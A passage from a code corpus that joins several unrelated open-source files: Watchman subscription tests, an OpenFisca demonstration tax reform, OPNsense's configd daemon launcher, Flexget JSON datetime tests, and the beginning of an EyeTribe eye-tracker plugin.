begin = self.waitForSub("drop", root)[0]
self.assertEqual("foo", begin["state-enter"])
self.touchRelative(root, "in-foo")
flush = self.watchmanCommand(
"flush-subscriptions", root, {"sync_timeout": 1000}
)
del flush["version"]
self.assertDictEqual(
{"synced": [], "no_sync_needed": [], "dropped": ["drop"]}, flush
)
self.touchRelative(root, "in-foo-2")
# We expect this to timeout because state=foo is asserted
with self.assertRaises(pywatchman.SocketTimeout):
self.waitForSub("drop", root, timeout=1)
self.watchmanCommand("state-leave", root, "foo")
self.assertNotEqual(
None,
self.waitForSub(
"drop",
root,
accept=lambda x: self.matchStateSubscription(x, "state-leave"),
),
)
# There should be no more subscription data to observe
# because we requested that it be dropped
with self.assertRaises(pywatchman.SocketTimeout):
self.waitForSub("drop", root, timeout=1)
# let's make sure that we can observe new changes
self.touchRelative(root, "out-foo")
self.assertFileList(root, files=["a", "in-foo", "in-foo-2", "out-foo"])
self.assertNotEqual(None, self.waitForSub("drop", root))
def test_defer_vcs(self):
root = self.mkdtemp()
# fake an hg control dir
os.mkdir(os.path.join(root, ".hg"))
# touch another file so that the initial subscription result comes
# through
self.touchRelative(root, "foo")
self.watchmanCommand("watch", root)
self.assertFileList(root, files=[".hg", "foo"])
self.watchmanCommand(
"subscribe",
root,
"defer",
{
"expression": ["type", "f"],
"fields": ["name", "exists"],
"defer_vcs": True,
},
)
dat = self.waitForSub("defer", root)[0]
self.assertEqual(True, dat["is_fresh_instance"])
self.assertEqual([{"name": "foo", "exists": True}], dat["files"])
# Pretend that hg is update the working copy
self.touchRelative(root, ".hg", "wlock")
# flush-subscriptions should force the update through
flush = self.watchmanCommand(
"flush-subscriptions", root, {"sync_timeout": 1000}
)
del flush["version"]
self.assertDictEqual(
{"synced": ["defer"], "no_sync_needed": [], "dropped": []}, flush
)
sub_data = self.getSubscription("defer", root)
self.assertEqual(1, len(sub_data))
self.assertFileListsEqual(
[".hg/wlock"], [d["name"] for d in sub_data[0]["files"]]
)
self.touchRelative(root, "in-foo")
# We expect this to timeout because the wlock file exists
with self.assertRaises(pywatchman.SocketTimeout):
self.waitForSub(
"defer", root, accept=lambda x: self.wlockExists(x, True), timeout=2
)
# Remove the wlock and allow subscriptions to flow
os.unlink(os.path.join(root, ".hg", "wlock"))
dat = self.waitForSub(
"defer", root, timeout=2, accept=lambda x: self.wlockExists(x, False)
)
self.assertNotEqual(None, dat)
def test_immediate_subscribe(self):
root = self.mkdtemp()
# fake an hg control dir
os.mkdir(os.path.join(root, ".hg"))
self.watchmanCommand("watch", root)
self.assertFileList(root, files=[".hg"])
self.watchmanCommand(
"subscribe",
root,
"nodefer",
{"fields": ["name", "exists"], "defer_vcs": False},
)
dat = self.waitForSub("nodefer", root)[0]
self.assertEqual(True, dat["is_fresh_instance"])
self.assertEqual([{"name": ".hg", "exists": True}], dat["files"])
# Pretend that hg is update the working copy
self.touchRelative(root, ".hg", "wlock")
dat = self.waitForSub(
"nodefer", root, accept=lambda x: self.wlockExists(x, True)
)
# We observed the changes even though wlock existed
self.assertNotEqual(None, dat)
os.unlink(os.path.join(root, ".hg", "wlock"))
dat = self.waitForSub(
"nodefer", root, accept=lambda x: self.wlockExists(x, False)
)
self.assertNotEqual(None, dat)
def test_multi_cancel(self):
"""Test that for multiple subscriptions on the same socket, we receive
cancellation notices for all of them."""
root = self.mkdtemp()
self.touchRelative(root, "lemon")
self.watchmanCommand("watch", root)
self.assertFileList(root, files=["lemon"])
for n in range(32):
sub_name = "sub%d" % n
self.watchmanCommand("subscribe", root, sub_name, {"fields": ["name"]})
# Drain the initial messages
dat = self.waitForSub(sub_name, root, remove=True)
self.assertEqual(len(dat), 1)
dat = dat[0]
self.assertFileListsEqual(dat["files"], ["lemon"])
self.watchmanCommand("watch-del", root)
for n in range(32):
# If the cancellation notice doesn't come through this will timeout.
dat = self.waitForSub("sub%d" % n, root)
self.assertEqual(len(dat), 1)
dat = dat[0]
self.assertTrue(dat["canceled"])
self.assertTrue(dat["unilateral"])
def test_subscribe(self):
root = self.mkdtemp()
a_dir = os.path.join(root, "a")
os.mkdir(a_dir)
self.touchRelative(a_dir, "lemon")
self.touchRelative(root, "b")
self.watchmanCommand("watch", root)
self.assertFileList(root, files=["a", "a/lemon", "b"])
self.watchmanCommand("subscribe", root, "myname", {"fields": ["name"]})
self.watchmanCommand(
"subscribe", root, "relative", {"fields": ["name"], "relative_root": "a"}
)
# prove initial results come through
dat = self.waitForSub("myname", root=root)[0]
self.assertEqual(True, dat["is_fresh_instance"])
self.assertFileListsEqual(dat["files"], ["a", "a/lemon", "b"])
# and that relative_root adapts the path name
dat = self.waitForSub("relative", root=root)[0]
self.assertEqual(True, dat["is_fresh_instance"])
self.assertFileListsEqual(dat["files"], ["lemon"])
# check that deletes show up in the subscription results
os.unlink(os.path.join(root, "a", "lemon"))
dat = self.waitForSub(
"myname",
root=root,
accept=lambda x: self.findSubscriptionContainingFile(x, "a/lemon"),
)
self.assertNotEqual(None, dat)
self.assertEqual(False, dat[0]["is_fresh_instance"])
dat = self.waitForSub(
"relative",
root=root,
accept=lambda x: self.findSubscriptionContainingFile(x, "lemon"),
)
self.assertNotEqual(None, dat)
self.assertEqual(False, dat[0]["is_fresh_instance"])
# Trigger a recrawl and ensure that the subscription isn't lost
self.watchmanCommand("debug-recrawl", root)
def matchesRecrawledDir(subdata):
for sub in subdata:
if "warning" in sub:
return True
return False
# ensure that there is at least one change to broadcast
self.touchRelative(root, "a")
dat = self.waitForSub("myname", root=root, accept=matchesRecrawledDir)
self.assertNotEqual(None, dat)
# Ensure that we observed the recrawl warning
warn = None
for item in dat:
if "warning" in item:
warn = item["warning"]
break
self.assertRegex(warn, r"Recrawled this watch")
# TODO: this test is very flaky on Windows
@unittest.skipIf(os.name == "nt", "win")
def test_flush_subscriptions(self):
root = self.mkdtemp()
with open(os.path.join(root, ".watchmanconfig"), "w") as f:
f.write(json.dumps({"win32_batch_latency_ms": 0}))
a_dir = os.path.join(root, "a")
os.mkdir(a_dir)
self.touchRelative(a_dir, "lemon.txt")
self.touchRelative(a_dir, "orange.dat")
self.touchRelative(root, "b")
self.watchmanCommand("watch", root)
self.assertFileList(
root, files=[".watchmanconfig", "a", "a/lemon.txt", "a/orange.dat", "b"]
)
self.watchmanCommand(
"subscribe", root, "sub1", {"fields": ["name"], "expression": ["type", "f"]}
)
self.watchmanCommand(
"subscribe",
root,
"sub2",
{
"fields": ["name"],
"expression": ["allof", ["type", "f"], ["suffix", "txt"]],
},
)
self.watchmanCommand(
"subscribe",
root,
"sub3",
{
"fields": ["name"],
"expression": ["allof", ["type", "f"], ["suffix", "dat"]],
},
)
root2 = self.mkdtemp()
self.touchRelative(root2, "banana")
self.watchmanCommand("watch", root2)
self.assertFileList(root2, files=["banana"])
ret = self.watchmanCommand(
"subscribe", root2, "sub-other", {"fields": ["name"]}
)
# discard the initial result PDUs
self.waitForSub("sub1", root=root)
self.waitForSub("sub2", root=root)
self.waitForSub("sub3", root=root)
# pause subscriptions so that the result of flush-subscriptions is
# deterministic
debug_ret = self.watchmanCommand(
"debug-set-subscriptions-paused", {"sub1": True, "sub2": True, "sub3": True}
)
self.assertDictEqual(
{
"sub1": {"old": False, "new": True},
"sub2": {"old": False, "new": True},
"sub3": {"old": False, "new": True},
},
debug_ret["paused"],
)
self.touchRelative(root, "c")
self.touchRelative(a_dir, "d.txt")
self.touchRelative(a_dir, "e.dat")
# test out a few broken flush-subscriptions
broken_args = [
((), "wrong number of arguments to 'flush-subscriptions'"),
((root,), "wrong number of arguments to 'flush-subscriptions'"),
(
(root, {"subscriptions": ["sub1"]}),
"key 'sync_timeout' is not present in this json object",
),
(
(root, {"subscriptions": "wat", "sync_timeout": 2000}),
"expected 'subscriptions' to be an array of subscription names",
),
(
(root, {"subscriptions": ["sub1", False], "sync_timeout": 2000}),
"expected 'subscriptions' to be an array of subscription names",
),
(
(root, {"subscriptions": ["sub1", "notsub"], "sync_timeout": 2000}),
"this client does not have a subscription named 'notsub'",
),
(
(root, {"subscriptions": ["sub1", "sub-other"], "sync_timeout": 2000}),
"subscription 'sub-other' is on root",
),
]
for args, err_msg in broken_args:
with self.assertRaises(pywatchman.WatchmanError) as ctx:
self.watchmanCommand("flush-subscriptions", *args)
self.assertIn(err_msg, str(ctx.exception))
ret = self.watchmanCommand(
"flush-subscriptions",
root,
{"sync_timeout": 1000, "subscriptions": ["sub1", "sub2"]},
)
version = ret["version"]
self.assertEqual([], ret["no_sync_needed"])
self.assertCountEqual(["sub1", "sub2"], ret["synced"])
# Do not wait for subscription results -- instead, make sure they've
# shown up immediately.
sub1_data = self.getSubscription("sub1", root)
sub2_data = self.getSubscription("sub2", root)
for sub_name, sub_data in [("sub1", sub1_data), ("sub2", sub2_data)]:
self.assertEqual(1, len(sub_data))
data = sub_data[0].copy()
# we'll verify these below
del data["files"]
del data["since"]
# this is subject to change so we can't verify it
del data["clock"]
self.assertDictEqual(
{
"version": version,
"is_fresh_instance": False,
"subscription": sub_name,
"root": root,
"unilateral": True,
},
data,
)
self.assertFileListsEqual(["a/d.txt", "a/e.dat", "c"], sub1_data[0]["files"])
self.assertFileListsEqual(["a/d.txt"], sub2_data[0]["files"])
# touch another file, make sure the updates come through again
self.touchRelative(a_dir, "f.dat")
ret = self.watchmanCommand(
"flush-subscriptions",
root,
# default for subscriptions is to sync all subscriptions matching
# root (so sub1, sub2 and sub3, but not sub-other)
{"sync_timeout": 1000},
)
self.assertCountEqual(["sub2"], ret["no_sync_needed"])
self.assertCountEqual(["sub1", "sub3"], ret["synced"])
# again, don't wait for the subscriptions
sub1_data2 = self.getSubscription("sub1", root)
sub2_data2 = self.getSubscription("sub2", root)
sub3_data2 = self.getSubscription("sub3", root)
self.assertEqual(1, len(sub1_data2))
# no updates to sub2, so we expect nothing
self.assertIs(None, sub2_data2)
self.assertEqual(1, len(sub3_data2))
self.assertEqual(
sub1_data[0]["clock"],
sub1_data2[0]["since"],
'for sub1, previous "clock" should be current "since"',
)
self.assertFileListsEqual(["a/f.dat"], sub1_data2[0]["files"])
self.assertFileListsEqual(["a/e.dat", "a/f.dat"], sub3_data2[0]["files"])
# now resume the subscriptions and make sure future updates (and only
# future updates) come through
self.watchmanCommand(
"debug-set-subscriptions-paused",
{"sub1": False, "sub2": False, "sub3": False},
)
self.touchRelative(root, "newfile.txt")
new_sub1 = self.waitForSub("sub1", root=root)[0]
new_sub2 = self.waitForSub("sub2", root=root)[0]
self.assertEqual(sub1_data2[0]["clock"], new_sub1["since"])
# for sub2 the clock is different because we've actually forced an
# evaluation in between in the second flush-subscriptions call, so we
# don't have a reference point
self.assertFileListsEqual(["newfile.txt"], new_sub1["files"])
self.assertFileListsEqual(["newfile.txt"], new_sub2["files"])
def test_unsub_deadlock(self):
"""I saw a stack trace of a lock assertion that seemed to originate
in the unsubByName() method. It looks possible for this to call
itself recursively and this test exercises that code path. It
also exercises a similar deadlock where multiple subscriptions from
multiple connections are torn down around the same time."""
root = self.mkdtemp()
self.watchmanCommand("watch", root)
clock = self.watchmanCommand("clock", root)["clock"]
for _ in range(0, 100):
clients = []
for i in range(0, 20):
client = self.getClient(no_cache=True)
client.query(
"subscribe", root, "sub%s" % i, {"fields": ["name"], "since": clock}
)
self.touchRelative(root, "a")
clients.append(client)
for client in clients:
client.close()
def test_subscription_cleanup(self):
"""Verify that subscriptions get cleaned up from internal state on
unsubscribes and socket disconnects. This test failing usually
indicates a reference cycle keeping the subscriber alive."""
root = self.mkdtemp()
a_dir = os.path.join(root, "a")
os.mkdir(a_dir)
self.touchRelative(a_dir, "lemon.txt")
self.touchRelative(a_dir, "orange.dat")
self.touchRelative(root, "b")
self.watchmanCommand("watch", root)
self.assertFileList(root, files=["a", "a/lemon.txt", "a/orange.dat", "b"])
self.watchmanCommand(
"subscribe", root, "sub1", {"fields": ["name"], "expression": ["type", "f"]}
)
self.touchRelative(a_dir, "wat.txt")
self.watchmanCommand(
"subscribe", root, "sub2", {"fields": ["name"], "expression": ["type", "f"]}
)
out = self.watchmanCommand("debug-get-subscriptions", root)
subs = {sub["info"]["name"] for sub in out["subscribers"]}
self.assertCountEqual({"sub1", "sub2"}, subs)
# this should remove sub1 from the map
self.watchmanCommand("unsubscribe", root, "sub1")
out = self.watchmanCommand("debug-get-subscriptions", root)
subs = {sub["info"]["name"] for sub in out["subscribers"]}
self.assertCountEqual({"sub2"}, subs)
# flush sub2 so that there's no reason anything else would be keeping
# it around
self.watchmanCommand("flush-subscriptions", root, {"sync_timeout": 1000})
# disconnect from the socket -- the next command will reconnect the
# socket, but sub2 should have disappeared
self.client.close()
# It might take a while for watchman to realize its connection has been
# reset, so check repeatedly.
def checkSubscribers():
out = self.watchmanCommand("debug-get-subscriptions", root)
return out["subscribers"]
self.assertWaitForEqual([], checkSubscribers)
# TODO: Assimilate this test into test_subscribe when Watchman gets
# unicode support.
# TODO: Correctly test subscribe with unicode on Windows.
@unittest.skipIf(os.name == "nt", "win")
@WatchmanTestCase.skip_for(codecs=["json"])
def test_subscribe_unicode(self):
unicode_filename = u"\u263a"
# On Python 2, pywatchman returns bytestrings by default. On Python 3
# it returns Unicode strings. So we need to take care of that.
if not pywatchman.compat.PYTHON3:
unicode_filename = unicode_filename.encode("utf-8")
root = self.mkdtemp()
a_dir = os.path.join(root, "a")
os.mkdir(a_dir)
self.touchRelative(a_dir, "lemon")
self.touchRelative(root, "b")
self.touchRelative(root, unicode_filename)
self.watchmanCommand("watch", root)
self.assertFileList(root, files=["a", "a/lemon", "b", unicode_filename])
self.watchmanCommand("subscribe", root, "myname", {"fields": ["name"]})
self.watchmanCommand(
"subscribe", root, "relative", {"fields": ["name"], "relative_root": "a"}
)
# prove initial results come through
dat = self.waitForSub("myname", root=root)[0]
self.assertEqual(True, dat["is_fresh_instance"])
self.assertFileListsEqual(dat["files"], ["a", "a/lemon", "b", unicode_filename])
os.unlink(os.path.join(root, "a", "lemon"))
# Trigger a recrawl and ensure that the subscription isn't lost
self.watchmanCommand("debug-recrawl", root)
def matchesRecrawledDir(subdata):
for sub in subdata:
if "warning" in sub:
return True
return False
# ensure that there is at least one change to broadcast
self.touchRelative(root, "a")
dat = self.waitForSub("myname", root=root, accept=matchesRecrawledDir)
self.assertNotEqual(None, dat)
# Ensure that we observed the recrawl warning
warn = None
for item in dat:
if "warning" in item:
warn = item["warning"]
break
self.assertRegex(warn, r"Recrawled this watch")
def findSubscriptionContainingFile(self, subdata, filename):
filename = norm_relative_path(filename)
for dat in subdata:
if "files" in dat and filename in self.normFileList(dat["files"]):
return dat
return None
def normFileList(self, files):
return sorted(map(norm_relative_path, files))
| apache-2.0 | -898,115,865,545,391,100 | 35.774763 | 88 | 0.564698 | false |
MalkIPP/ipp_work | ipp_work/reforms/ir_marg_rate.py | 1 | 2157 | # -*- coding: utf-8 -*-
# OpenFisca -- A versatile microsimulation software
# By: OpenFisca Team <[email protected]>
#
# Copyright (C) 2011, 2012, 2013, 2014, 2015 OpenFisca Team
# https://github.com/openfisca
#
# This file is part of OpenFisca.
#
# OpenFisca is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# OpenFisca is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import division
import logging
from openfisca_core import formulas, reforms
from openfisca_france.model.prelevements_obligatoires.impot_revenu import ir
log = logging.getLogger(__name__)
class rni(formulas.SimpleFormulaColumn):
reference = ir.rni
label = u"Revenu net imposable"
url = "http://impotsurlerevenu.org/definitions/115-revenu-net-imposable.php"
def function(self, simulation, period):
        ''' Net taxable income (revenu net imposable) or deficit to carry forward '''
period = period.start.offset('first-of', 'month').period('year')
rng = simulation.calculate('rng', period)
abat_spe = simulation.calculate('abat_spe', period)
print "passe par simulation"
return period, rng - abat_spe + 10
def build_reform(tax_benefit_system):
# reference_legislation_json = tax_benefit_system.legislation_json
# reform_legislation_json = copy.deepcopy(reference_legislation_json)
# reform_legislation_json['children'].update(reform_legislation_subtree)
Reform = reforms.make_reform(
# legislation_json = reform_legislation_json,
name = u'Revenu imposable + 10',
new_formulas = [rni],
reference = tax_benefit_system,
)
return Reform()
| agpl-3.0 | 397,067,888,802,936,060 | 32.153846 | 80 | 0.713225 | false |
opnsense/core | src/opnsense/service/configd.py | 1 | 6724 | #!/usr/local/bin/python3
# -*- coding: utf-8 -*-
"""
Copyright (c) 2014-2019 Ad Schellevis <[email protected]>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
--------------------------------------------------------------------------------------
package : configd
function: delivers a process coordinator to handle frontend functions
"""
import os
import sys
import logging
import logging.handlers  # SysLogHandler is referenced via logging.handlers below
import signal
import time
import socket
import subprocess
import syslog
import modules.processhandler
import modules.csconfigparser
from modules.daemonize import Daemonize
import cProfile
# find program path
program_path = os.path.dirname(os.path.abspath(__file__))
# set working directory to program_path
sys.path.append(program_path)
os.chdir(program_path)
def get_config():
""" open configuration
"""
cnf = modules.csconfigparser.CSConfigParser()
cnf.read('conf/configd.conf')
return cnf
def validate_config(cnf):
""" validate configuration, exit on missing item
:param cnf: config handle
"""
for config_item in ['socket_filename', 'pid_filename']:
        if not cnf.has_section('main') or not cnf.has_option('main', config_item):
print('configuration item main/%s not found in %s/conf/configd.conf' % (config_item, program_path))
sys.exit(0)
def main(cnf, simulate=False, single_threaded=False):
""" configd startup
:param cnf: config handle
:param simulate: simulate only
:param single_threaded: start single threaded
"""
# setup configd environment to use for all configured actions
if not cnf.has_section('environment'):
config_environment = os.environ.copy()
else:
config_environment = dict()
for envKey in cnf.items('environment'):
config_environment[envKey[0]] = envKey[1]
# run process coordinator ( on console or as daemon )
    # if command-line arguments contain "simulate", start in simulation mode
if simulate:
proc_handler = modules.processhandler.Handler(socket_filename=cnf.get('main', 'socket_filename'),
config_path='%s/conf' % program_path,
config_environment=config_environment,
simulation_mode=True)
else:
proc_handler = modules.processhandler.Handler(socket_filename=cnf.get('main', 'socket_filename'),
config_path='%s/conf' % program_path,
config_environment=config_environment)
proc_handler.single_threaded = single_threaded
proc_handler.run()
def run_watch():
""" start configd process and restart if it dies unexpected
"""
current_child_pid = None
def signal_handler(sig, frame):
if current_child_pid is not None:
os.kill(current_child_pid, sig)
sys.exit(1)
signal.signal(signal.SIGTERM, signal_handler)
while True:
process = subprocess.Popen(['/usr/local/opnsense/service/configd.py', 'console'])
# save created pid for signal_handler() to use
current_child_pid = process.pid
process.wait()
# wait a small period of time before trying to restart a new process
time.sleep(0.5)
this_config = get_config()
validate_config(this_config)
if len(sys.argv) > 1 and 'console' in sys.argv[1:]:
print('run %s in console mode' % sys.argv[0])
syslog.openlog("configd.py")
if 'profile' in sys.argv[1:]:
# profile configd
# for graphical output use gprof2dot:
# gprof2dot -f pstats /tmp/configd.profile -o /tmp/callingGraph.dot
# (https://code.google.com/p/jrfonseca/wiki/Gprof2Dot)
print ("...<ctrl><c> to stop profiling")
profile = cProfile.Profile()
profile.enable(subcalls=True)
try:
if len(sys.argv) > 1 and 'simulate' in sys.argv[1:]:
print('simulate calls.')
main(cnf=this_config, simulate=True, single_threaded=True)
else:
main(cnf=this_config, single_threaded=True)
except KeyboardInterrupt:
pass
except:
raise
profile.disable()
profile.dump_stats('/tmp/configd.profile')
else:
main(cnf=this_config)
else:
# run as daemon, wrap the actual work process to enable automatic restart on sudden death
syslog_socket = "/var/run/log"
if os.path.exists(syslog_socket):
try:
# bind log handle to syslog to catch messages from Daemonize()
# (if syslog facility is active)
loghandle = logging.getLogger("configd.py")
loghandle.setLevel(logging.INFO)
handler = logging.handlers.SysLogHandler(address=syslog_socket,
facility=logging.handlers.SysLogHandler.LOG_DAEMON)
handler.setFormatter(logging.Formatter("%(name)s %(message)s"))
loghandle.addHandler(handler)
except socket.error:
loghandle = None
else:
loghandle = None
# daemonize process
daemon = Daemonize(app=__file__.split('/')[-1].split('.py')[0],
pid=this_config.get('main', 'pid_filename'),
action=run_watch,
logger=loghandle
)
daemon.start()
sys.exit(0)
| bsd-2-clause | 5,773,901,483,905,628,000 | 37.867052 | 111 | 0.625074 | false |
qvazzler/Flexget | tests/test_utils.py | 1 | 1326 | from __future__ import unicode_literals, division, absolute_import
from builtins import * # pylint: disable=unused-import, redefined-builtin
from datetime import datetime
from flexget.utils import json
class TestJson(object):
def test_json_encode_dt(self):
date_str = '2016-03-11T17:12:17Z'
dt = datetime.strptime(date_str, '%Y-%m-%dT%H:%M:%SZ')
encoded_dt = json.dumps(dt, encode_datetime=True)
assert encoded_dt == '"%s"' % date_str
def test_json_encode_dt_dict(self):
date_str = '2016-03-11T17:12:17Z'
dt = datetime.strptime(date_str, '%Y-%m-%dT%H:%M:%SZ')
date_obj = {'date': dt}
encoded_dt = json.dumps(date_obj, encode_datetime=True)
assert encoded_dt == '{"date": "%s"}' % date_str
def test_json_decode_dt(self):
date_str = '"2016-03-11T17:12:17Z"'
dt = datetime.strptime(date_str, '"%Y-%m-%dT%H:%M:%SZ"')
decoded_dt = json.loads(date_str, decode_datetime=True)
assert dt == decoded_dt
def test_json_decode_dt_obj(self):
date_str = '"2016-03-11T17:12:17Z"'
date_obj_str = '{"date": %s}' % date_str
decoded_dt = json.loads(date_obj_str, decode_datetime=True)
dt = datetime.strptime(date_str, '"%Y-%m-%dT%H:%M:%SZ"')
assert decoded_dt == {'date': dt}
| mit | 7,716,064,691,289,933,000 | 35.833333 | 74 | 0.602564 | false |
infant-cognition-tampere/drop-eyetribe-plugin | drop_eyetribe/EyetrackerEyeTribe.py | 1 | 20648 | """TheEyeTribe plugin for drop."""
from drop.Sensor import Sensor
from threading import Thread
from Queue import Queue
import socket
from select import select
import json
import nudged
import glib
import os
import re
from datetime import datetime
import time
import csv
# Regular expression to match timestamp format given by eyetribe server.
# Compiled initially during import of module.
_timestamp_matcher = re.compile(
"^(?P<year>[0-9]{4})-(?P<month>[0-9]{2})-(?P<day>[0-9]{2}) "
"(?P<hour>[0-9]{2}):(?P<minute>[0-9]{2}):(?P<second>[0-9]{2})\."
"(?P<millisecond>[0-9]{3})$")
def _parse_timestamp(ts):
m = _timestamp_matcher.match(ts)
dt = datetime(year=int(m.group('year')),
month=int(m.group('month')),
day=int(m.group('day')),
hour=int(m.group('hour')),
minute=int(m.group('minute')),
second=int(m.group('second')),
microsecond=int(
m.group('millisecond')) * 1000)
return ((time.mktime(dt.timetuple()) * 1000) +
(dt.microsecond / 1000)) * 1000.0
def _get_validity_from_state(state):
if state & 0x1 and state & 0x2 and state & 0x4:
return 0
return -1
def _convert_gazedata_frame(frame):
# >LeftEyeNx
# >LeftEyeNy
# >LeftEyePosition3dRelativeX
# >LeftEyePosition3dRelativeY
# LeftEyePosition3dRelativeZ ?
# LeftEyePosition3dX
# LeftEyePosition3dY
# LeftEyePosition3dZ
# >LeftEyePupilDiameter
# >RightEyeNx
# >RightEyeNy
# >RightEyePosition3dRelativeX
# >RightEyePosition3dRelativeY
# RightEyePosition3dRelativeZ ?
# RightEyePosition3dX ?
# RightEyePosition3dY ?
# RightEyePosition3dZ ?
# >RightEyePupilDiameter
# >TETTime
# >ValidityLeftEye
# >ValidityRightEye
# >XGazePosLeftEye
# >XGazePosRightEye
# >YGazePosLeftEye
# >YGazePosRightEye
row = {'XGazePosLeftEye': frame['lefteye']['raw']['x'],
'YGazePosLeftEye': frame['lefteye']['raw']['y'],
'XGazePosRightEye': frame['righteye']['raw']['x'],
'YGazePosRightEye': frame['righteye']['raw']['y'],
'LeftEyeNx': frame['lefteye_nudged']['raw']['x'],
'LeftEyeNy': frame['lefteye_nudged']['raw']['y'],
'RightEyeNx': frame['righteye_nudged']['raw']['x'],
'RightEyeNy': frame['righteye_nudged']['raw']['y'],
'LeftEyePosition3dRelativeX':
1.0 - frame['lefteye']['pcenter']['x'],
'LeftEyePosition3dRelativeY':
frame['lefteye']['pcenter']['y'],
'RightEyePosition3dRelativeX':
1.0 - frame['righteye']['pcenter']['x'],
'RightEyePosition3dRelativeY':
frame['righteye']['pcenter']['y'],
'LeftEyePupilDiameter': frame['lefteye']['psize'],
'RightEyePupilDiameter': frame['righteye']['psize'],
'ValidityBothEyes':
_get_validity_from_state(frame['state']),
'TETTime':
_parse_timestamp(frame['timestamp'])}
return row
def _convert_json_to_tabdelim(source_filename, dest_filename):
"""Convert file from JSON to CSV format."""
with open(source_filename, 'r') as json_file:
json_lines = json_file.readlines()
json_objects = map(json.loads, json_lines)
json_frames = filter(lambda x: 'frame' in x, json_objects)
json_tags = filter(lambda x: 'tag' in x, json_objects)
frame_dicts = [_convert_gazedata_frame(f['frame']) for f in json_frames]
frame_keys = list(frozenset(reduce(
lambda x, y: x + y, [d.keys() for d in frame_dicts])))
tag_keys = list(frozenset(reduce(
lambda x, y: x + y, [t['tag'].keys() for t in json_tags])))
tag_keys = filter(lambda x: x != 'secondary_id', tag_keys)
# Generate list of start-end tags
# Assuming that start and end tags always follow each other and that
# there are even amount of tags
assert len(json_tags) % 2 == 0
tags = zip(*[iter([t['tag'] for t in json_tags])]*2)
# Modify frame dicts to contain tag information where present
for f in frame_dicts:
frame_time = f['TETTime'] / (1000 * 1000)
for t in tags:
assert t[0]['secondary_id'] == 'start' and \
t[1]['secondary_id'] == 'end'
start_time = t[0]['timestamp']
end_time = t[1]['timestamp']
if frame_time > start_time and frame_time < end_time:
tagdict = {k: str(v) for k, v in t[0].iteritems()}
tagdict.pop('secondary_id')
f.update(tagdict)
with open(dest_filename, 'w') as csv_file:
writer = csv.DictWriter(csv_file,
fieldnames=frame_keys + tag_keys,
dialect='excel-tab')
writer.writeheader()
writer.writerows(frame_dicts)
class EyeTribeSocket(Thread):
"""Thread for socket-based communication with EyeTribe server."""
def __init__(self, host="localhost", port=6555, callback=None):
"""Constructor."""
super(EyeTribeSocket, self).__init__()
# Handle messages with callback
self.callback = callback
# Create new non-blocking socket and connect
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((host, port))
self.sock.setblocking(0)
self.send_queue = Queue()
def send(self, msg):
"""
Put a packet into send queue.
Thread main loop will process it in sending phase.
"""
# TODO MAYBE: Check message validity before sending
# Put message into send_queue
self.send_queue.put(msg)
def run(self):
"""Main loop of the socket thread."""
partial_data = ""
while self.should_run:
# Get stuff from send_queue and send
while not self.send_queue.empty():
msg = self.send_queue.get(False)
self.sock.send(msg)
self.send_queue.task_done()
# Select from sockets
# TODO: Somewhat hacky solution to use 0.01 timeout,
# examine the possibility to use "signals."
read_sockets, write_sockets, err_sockets = \
select([self.sock], [], [], 0.01)
for sock in read_sockets:
if sock == self.sock:
read_data = sock.recv(512)
if not read_data:
raise IOError
read_data = partial_data + read_data
msgs = read_data.split('\n')
for msg in msgs[:-1]:
# Do a callback for received messages
if self.callback is not None:
self.callback(msg)
partial_data = msgs[-1]
def start(self):
"""Start the socket thread."""
self.should_run = True
return super(EyeTribeSocket, self).start()
def stop(self):
"""Cause the socket loop to exit."""
self.should_run = False
class EyeTribe(object):
"""
Class for interfacing with EyeTribe tracker.
Mostly handles
serialization with The Eye Tribe server and encapsulates a socket
thread.
"""
get_value_keywords = [
'push',
'heartbeatinterval',
'version',
'trackerstate',
'framerate',
'iscalibrated',
'iscalibrating',
'screenindex',
'screenresw',
'screenresh',
'screenpsyw',
'screenpsyh'
]
valid_keywords = get_value_keywords + ['calibresult', 'frame']
def __init__(self, host, port, cb_frame=None):
"""Constructor."""
self.host = host
self.port = port
self.sockthread = None
self.cb_frame = cb_frame
self.values = {}
def _init_socket(self):
if self.sockthread is not None:
return
self.sockthread = EyeTribeSocket(self.host,
self.port,
self._msg_handler)
self.sockthread.start()
def _msg_handler(self, raw_msg):
# Decode msg
msg = json.loads(raw_msg)
# assert msg.get('statuscode') == 200
if msg.get('category') == 'tracker':
# Update internal value dict
self.values.update(msg.get('values', {}))
# If frame, do a frame callback
if 'frame' in msg.get('values', {}):
self.cb_frame(msg.get('values').get('frame'))
def _gen_request(self, category, request, values):
# TODO: Some parameter validity checking here
return {'category': category,
'request': request,
'values': values}
def _gen_set_values_msg(self, values):
v = dict()
v.update(values)
v.update({'version': 2})
return self._gen_request('tracker', 'set', v)
def _gen_get_values_msg(self, values):
return self._gen_request('tracker', 'get', values)
def _gen_set_push_msg(self, state):
return self._gen_set_values_msg({'push': state})
def _start_push(self):
